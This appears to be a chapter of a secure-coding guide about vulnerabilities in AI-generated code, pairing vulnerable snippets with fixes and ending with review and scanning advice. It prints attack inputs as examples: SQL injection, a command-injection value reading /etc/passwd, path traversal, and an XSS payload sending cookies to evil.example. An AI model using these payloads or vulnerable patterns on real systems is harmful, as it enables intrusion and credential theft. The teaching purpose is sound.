In Chapter 1, we explored how sensitive data can leak through AI coding assistants. Now we're tackling an even more fundamental problem: AI tools regularly generate code that contains security vulnerabilities.
Here's the uncomfortable truth: AI coding assistants are trained on billions of lines of public code, and much of that code is insecure. When AI generates code, it reproduces the patterns it learned, including the vulnerable ones. The result? Around 48% of AI-generated code contains security vulnerabilities [1].
This chapter explores why AI generates vulnerable code, what specific vulnerability patterns appear most frequently, and how to catch and fix them before they reach production.
AI coding assistants work through statistical pattern matching. They've seen thousands of examples of authentication code, database queries, API endpoints, and file operations. When you ask them to generate similar code, they produce what statistically "looks right" based on their training data.
But here's the critical issue: AI doesn't understand security intent. It doesn't reason about threat models, attack vectors, or security boundaries. It generates code that looks functionally correct without considering whether it's secure.
Think of it like this: If you trained someone to cook by showing them thousands of random cooking videos from the internet — some from professional chefs, many from amateurs, and some showing outright dangerous practices — they'd learn to make dishes that look like food. But they might also reproduce unsafe food handling practices because those appeared frequently in the training data.
That's exactly what's happening with AI-generated code.
Before we dive into specific vulnerability patterns, let's look at what research tells us about the scope of this problem:
Multiple studies point to a consistent pattern: AI assistance increases the speed of coding but also the likelihood that security flaws slip in. A 2024 large-scale comparison found roughly half of AI-generated snippets contained exploitable vulnerabilities, with SQL injection and path traversal among the most common [1]. A 2023 controlled study showed that developers using AI assistance were more likely to introduce vulnerabilities, and more likely to trust the output, resulting in measurably less secure code overall [2]. A 2024 systematic review across models observed persistently high vulnerability rates even for stronger models in security-critical scenarios [3]. Earlier work analyzing Copilot outputs found that around 40% of suggestions had security weaknesses, especially around authentication, cryptography, and input handling [4].
Perhaps most concerning is the trust gap: many developers feel AI output is safer than it is. Surveys indicate strong perceived security benefits, yet empirical analyses consistently show the opposite: AI code often needs more scrutiny, not less. This overconfidence leads reviewers to skim rather than challenge suggestions, letting issues through [5].
This creates a perfect storm: vulnerable code being generated at scale and accepted without adequate review.
Let's explore the most common security vulnerabilities that appear in AI-generated code, with real examples and fixes.
| Rank | Vulnerability | Severity | Why AI Generates This |
|---|---|---|---|
| 🥇 | SQL Injection | 🔴 CRITICAL | String-building for queries is ubiquitous in training data |
| 🥈 | Missing Auth/Authz | 🔴 CRITICAL | Prompts focus on functionality, not security boundaries |
| 🥉 | Command Injection | 🟠 HIGH | Training examples interpolate input into shell commands |
| 4 | Path Traversal | 🟠 HIGH | File operations rarely include validation in examples |
| 5 | Insecure Deserialization | 🟠 HIGH | Security implications aren't obvious in library examples |
| 6 | Missing Input Validation | 🟠 HIGH | AI focuses on "happy path" logic |
| 7 | Cross-Site Scripting (XSS) | 🟡 MEDIUM | Output encoding often omitted in templates |
| 8 | Weak Cryptography | 🟡 MEDIUM | Training data includes outdated algorithms |
| 9 | Hardcoded Secrets | 🟡 MEDIUM | Fake examples in training look like real patterns |
| 10 | Poor Error Handling | 🔵 LOW | "Happy path" bias omits edge cases |
Key Finding: Research shows SQL injection and path traversal are the most frequently occurring vulnerabilities in AI-generated code, with authentication/authorization issues close behind [1].
SQL injection. Why this happens: String-building for queries is ubiquitous online, so assistants reproduce it, even though parameterization is the secure default.
Vulnerable code (AI-generated):
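Something like this minimal sketch, assuming a SQLite-backed user lookup (the table and helper names are illustrative):

```python
import sqlite3

def get_user(username):
    conn = sqlite3.connect("app.db")
    # Vulnerable: user input is formatted directly into the SQL text
    query = f"SELECT * FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchone()
```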
This allows an attacker to manipulate username and execute arbitrary SQL:
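For example, with a hypothetical payload:

```python
# The closing quote breaks out of the string literal, and OR '1'='1'
# makes the WHERE clause true for every row in the table
get_user("' OR '1'='1")
```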
Secure version:
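A parameterized version of the same sketch:

```python
def get_user(username):
    conn = sqlite3.connect("app.db")
    # The placeholder is filled in by the driver; user data never
    # becomes part of the SQL text itself
    query = "SELECT * FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchone()
```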
Parameterization cleanly separates SQL logic from user data, preventing injection.
Missing authentication and authorization. Why this happens: Prompts emphasize functionality (“create an endpoint”) while security boundaries (who can call it, and for which resource?) are often unstated and therefore omitted.
Vulnerable code (AI-generated):
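An Express-style sketch of the pattern; the route and the `User` model (with a Mongoose-like `findByIdAndUpdate`) are illustrative assumptions:

```javascript
// Vulnerable: no authentication middleware and no ownership check
app.put("/api/users/:id", async (req, res) => {
  const user = await User.findByIdAndUpdate(req.params.id, req.body, { new: true });
  res.json(user);
});
```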
Without explicit checks, anyone can call the endpoint, update other users, and even escalate privileges by changing roles.
Secure version:
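One way to close the gap, assuming a `requireAuth` middleware that populates `req.user`:

```javascript
app.put("/api/users/:id", requireAuth, async (req, res) => {
  // Authorization: only the account owner or an admin may update this record
  if (req.user.id !== req.params.id && req.user.role !== "admin") {
    return res.status(403).json({ error: "Forbidden" });
  }

  // Never accept privilege fields from the request body
  const { role, ...allowedFields } = req.body;

  const user = await User.findByIdAndUpdate(req.params.id, allowedFields, { new: true });
  res.json(user);
});
```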
Command injection. Why this happens: Many examples interpolate untrusted input into shell commands; assistants mirror that pattern.
Vulnerable code (AI-generated):
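A minimal sketch, assuming a hypothetical diagnostics helper:

```python
import subprocess

def ping_host(hostname):
    # Vulnerable: shell=True plus string interpolation hands the whole
    # command line to the shell, including anything the user typed
    return subprocess.run(f"ping -c 1 {hostname}", shell=True, capture_output=True)
```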
The problem: An attacker can inject shell commands:
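For instance:

```python
# The semicolon terminates the ping command, and the shell then runs
# the attacker's second command
ping_host("example.com; cat /etc/passwd")
```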
Secure version:
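A safer version of the same sketch:

```python
import re
import subprocess

HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]+$")

def ping_host(hostname):
    # Validate against a strict allowlist first
    if not HOSTNAME_RE.fullmatch(hostname):
        raise ValueError("invalid hostname")
    # Pass arguments as a list (no shell), so the value is a single argv entry
    return subprocess.run(["ping", "-c", "1", hostname], capture_output=True)
```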
Path traversal. Why AI generates this: File operations with user input are common, and proper validation is often omitted in training data.
Vulnerable code (AI-generated):
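A minimal sketch, assuming an uploads directory and a download helper (names are illustrative):

```python
import os

UPLOAD_DIR = "/var/app/uploads"

def read_upload(filename):
    # Vulnerable: the user-supplied filename is joined blindly,
    # so "../" sequences can walk out of the uploads directory
    path = os.path.join(UPLOAD_DIR, filename)
    with open(path) as f:
        return f.read()
```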
The problem: Attacker can access any file:
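For example:

```python
# Each "../" climbs one directory above UPLOAD_DIR
read_upload("../../../etc/passwd")
```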
Secure version:
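One way to fix the sketch:

```python
import os

UPLOAD_DIR = os.path.realpath("/var/app/uploads")

def read_upload(filename):
    # Resolve the final path and confirm it is still inside UPLOAD_DIR
    path = os.path.realpath(os.path.join(UPLOAD_DIR, filename))
    if os.path.commonpath([UPLOAD_DIR, path]) != UPLOAD_DIR:
        raise PermissionError("path escapes the upload directory")
    with open(path) as f:
        return f.read()
```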
Insecure deserialization. Why AI generates this: Serialization libraries are widely used, and the security implications aren't obvious in code examples.
Vulnerable code (AI-generated):
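A minimal sketch, assuming session data arrives as bytes from the client:

```python
import pickle

def load_session(data):
    # Vulnerable: pickle runs attacker-controlled constructors and
    # __reduce__ logic while deserializing
    return pickle.loads(data)
```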
The problem: Pickle can execute arbitrary code during deserialization. An attacker can craft malicious serialized data that executes code on the server.
Secure version:
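A safer sketch using a data-only format:

```python
import json

def load_session(data):
    # JSON yields only plain data types (dicts, lists, strings, numbers),
    # so deserializing it cannot execute code
    return json.loads(data)
```

If a binary format is genuinely unavoidable, sign the payload and verify the signature before deserializing anything.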
Missing input validation. Why AI generates this: AI focuses on the "happy path" and often omits validation logic.
Vulnerable code (AI-generated):
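An Express-style sketch; the `Order` model is an illustrative assumption:

```javascript
// Vulnerable: whatever the client sends is written straight to the database
app.post("/api/orders", async (req, res) => {
  const order = await Order.create(req.body);
  res.json(order);
});
```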
The problems: nothing checks that the expected fields are present or have sane types and ranges, and unexpected fields in the request body are written straight through to the database (mass assignment).
Secure version:
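The same sketch with explicit validation:

```javascript
app.post("/api/orders", async (req, res) => {
  const { productId, quantity } = req.body;

  // Validate exactly the fields this endpoint accepts
  if (typeof productId !== "string" || productId.length === 0) {
    return res.status(400).json({ error: "productId is required" });
  }
  if (!Number.isInteger(quantity) || quantity < 1 || quantity > 100) {
    return res.status(400).json({ error: "quantity must be an integer between 1 and 100" });
  }

  // Build the record from validated values only, never from req.body wholesale
  const order = await Order.create({ productId, quantity, userId: req.user.id });
  res.json(order);
});
```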
Cross-site scripting (XSS). Why AI generates this: Templating and output-generation code often omits proper escaping.
Vulnerable code (AI-generated):
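A browser-side sketch of the pattern:

```javascript
// Vulnerable: the comment text is concatenated into markup and parsed as HTML
function renderComment(comment) {
  const container = document.getElementById("comments");
  container.innerHTML += `<div class="comment">${comment.text}</div>`;
}
```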
The problem: User-supplied data is inserted directly into HTML without escaping.
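For example, a hypothetical malicious comment:

```javascript
// The onerror handler runs in every visitor's browser when this renders
renderComment({
  text: '<img src=x onerror="fetch(\'https://evil.example/?c=\' + document.cookie)">'
});
```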
Secure version:
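The same sketch using text-only insertion:

```javascript
// Secure: textContent treats the value as plain text, never as markup
function renderComment(comment) {
  const container = document.getElementById("comments");
  const div = document.createElement("div");
  div.className = "comment";
  div.textContent = comment.text;
  container.appendChild(div);
}
```

Server-rendered templates should lean on their framework's auto-escaping rather than string concatenation.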
Weak cryptography. Why AI generates this: Cryptography examples in training data often use outdated or weak algorithms.
Vulnerable code (AI-generated):
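A minimal password-hashing sketch:

```python
import hashlib

def hash_password(password):
    # Vulnerable: MD5 is fast and broken, and there is no salt
    return hashlib.md5(password.encode()).hexdigest()
```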
The problems: MD5 is cryptographically broken and fast enough to brute-force at scale, and without a per-user salt, identical passwords produce identical hashes and precomputed lookup tables work.
Secure version:
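A standard-library sketch using a salted, deliberately slow key-derivation function (a dedicated library such as bcrypt or argon2 works equally well):

```python
import hashlib
import hmac
import os

def hash_password(password):
    # Random per-user salt plus a memory-hard KDF
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt + digest

def verify_password(password, stored):
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    # Constant-time comparison avoids timing side channels
    return hmac.compare_digest(candidate, digest)
```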
Hardcoded secrets. Why AI generates this: Training data contains countless examples with hardcoded credentials (often fake examples that look real).
Vulnerable code (AI-generated):
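A minimal sketch (the values are obviously fake):

```python
# Vulnerable: credentials are committed to version control along with the code
DATABASE_URL = "postgres://admin:SuperSecret123@db.example.com:5432/prod"
API_KEY = "sk_live_EXAMPLE_NOT_A_REAL_KEY"
```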
The problems: the credentials are visible to anyone with access to the repository (and to any AI tool that reads it), they remain in version-control history even after being removed, and rotating them requires a code change and a redeploy.
Secure version:
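The same configuration read from the environment (a secrets manager works just as well):

```python
import os

# Secure: secrets come from the environment at runtime and never
# appear in source control
DATABASE_URL = os.environ["DATABASE_URL"]
API_KEY = os.environ["API_KEY"]
```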
Poor error handling. Why AI generates this: AI generates the "happy path" logic but often omits comprehensive error handling.
Vulnerable code (AI-generated):
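A minimal sketch, assuming a hypothetical `db.find_account` helper:

```python
def get_account_balance(user_id):
    # Vulnerable: a missing account or a database outage becomes an
    # unhandled exception, often surfacing a stack trace to the client
    account = db.find_account(user_id)
    return account["balance"]
```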
The problems: unhandled exceptions can surface stack traces and internal details to the caller, nothing is logged for operators, and an expected condition like a missing account is indistinguishable from a server fault.
Secure version:
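The same sketch with deliberate error handling:

```python
import logging

logger = logging.getLogger(__name__)

def get_account_balance(user_id):
    try:
        account = db.find_account(user_id)  # hypothetical data-access helper
    except Exception:
        # Log the details server-side; tell the caller only that it failed
        logger.exception("balance lookup failed for user %s", user_id)
        raise RuntimeError("internal error, please try again later")

    if account is None:
        # Expected condition gets its own clear, non-leaky error
        raise LookupError("account not found")

    return account["balance"]
```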
Understanding why AI generates these vulnerable patterns helps us address the root causes:
The internet is full of insecure code examples. Stack Overflow answers, tutorial blogs, GitHub repositories — many contain vulnerabilities. When AI trains on this data, it learns both good and bad patterns.
What's secure in one context may be insecure in another. AI lacks the contextual understanding to know when security controls are needed. A code snippet that's fine for a local script becomes dangerous in a public API.
Training data disproportionately shows functional code, not defensive code. Examples focus on making things work, not on edge cases, error handling, or security boundaries.
AI doesn't think like an attacker. It doesn't ask "how could this be abused?" or "what if the user is malicious?" It generates code that assumes good-faith inputs.
Secure code often relies on implicit context: middleware, frameworks, environment configuration. AI generates isolated code snippets without these protective layers.
Now that you know what to look for, here's how to systematically catch these issues:
When reviewing AI-generated code, explicitly check:
Authentication & Authorization: Does every endpoint require authentication, and does it verify that the caller is allowed to act on the specific resource being accessed?
Input Validation: Are all user-supplied values checked for type, length, format, and range before they are used?
SQL & Command Injection: Are database queries parameterized, and are external commands built from argument lists rather than interpolated strings?
Output Encoding: Is user-supplied data escaped or encoded before being rendered in HTML or other output?
Cryptography: Are modern algorithms used (no MD5 or SHA-1 for passwords), with per-user salts and no secrets in the code?
Error Handling: Are failures logged server-side while callers receive generic messages without stack traces or internal details?
Session Management: Are session tokens generated from a secure random source, given sensible expirations, and invalidated on logout?
Integrate these tools into your workflow:
Static Application Security Testing (SAST): scanners that analyze source code for the vulnerability patterns described in this chapter before it ships.
IDE integration: many SAST tools offer IDE plugins that flag issues in real time, while you are still reviewing the AI's suggestion.
Pre-commit hooks: run security scanners locally so vulnerable code is caught before it is even committed.
CI gates: block merges if security issues are found during automated checks.
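As one illustrative sketch (assuming GitHub Actions and the CodeQL action; adjust the language list to your stack):

```yaml
name: security-scan
on: [pull_request]

jobs:
  codeql:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      security-events: write
    steps:
      - uses: actions/checkout@v4
      - uses: github/codeql-action/init@v3
        with:
          languages: python, javascript
      - uses: github/codeql-action/analyze@v3
```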
Guide AI toward secure code from the start:
❌ Bad prompt:
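For instance (the wording is illustrative):

```text
Create an API endpoint that lets users update their profile information.
```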
✅ Good prompt:
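For instance (again illustrative; adapt the requirements to your stack):

```text
Create an Express endpoint that lets an authenticated user update their own profile.
Security requirements:
- Require authentication and verify the caller owns the profile being updated
- Accept only an explicit allowlist of fields (no role or permission changes)
- Validate every field's type, length, and format
- Use parameterized queries for all database access
- Return generic error messages and log details server-side
```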
Even better, add a .github/copilot-instructions.md file to your repository:
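A sketch of what such a file might contain (the contents are illustrative, not an official template):

```markdown
## Security requirements for all generated code

- Use parameterized queries; never build SQL by string concatenation.
- Every endpoint must enforce authentication and check resource ownership.
- Validate all user input (type, length, format) before using it.
- Never hardcode secrets; read them from environment variables.
- Escape or encode user-supplied data before rendering it in HTML.
- Prefer modern cryptography (no MD5 or SHA-1 for passwords).
```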
An anonymized SaaS team shipped an AI-generated data export endpoint without security review; the consequences surfaced within two weeks.
Use the earlier "How to Catch Vulnerable AI Code" section as the single source of truth for reviewing and remediating issues like these.
Before moving to the next chapter, make sure you understand why AI assistants generate vulnerable code, which vulnerability patterns appear most frequently (and what their secure counterparts look like), and how to catch these issues through review checklists, automated scanning, and security-aware prompting.
[1] arXiv (2024) – How secure is AI-generated Code: A Large-Scale Comparison of Large Language Models
[2] arXiv (2023) – Do Users Write More Insecure Code with AI Assistants?
[3] IEEE Security & Privacy (2024) – State of the Art of the Security of Code Generated by LLMs: A Systematic Literature Review
[4] arXiv (2021) – Asleep at the Keyboard? Assessing the Security of GitHub Copilot's Code Contributions
[5] Snyk (2024) – 2024 Open Source Security Report: Slowing Progress and New Challenges for DevSecOps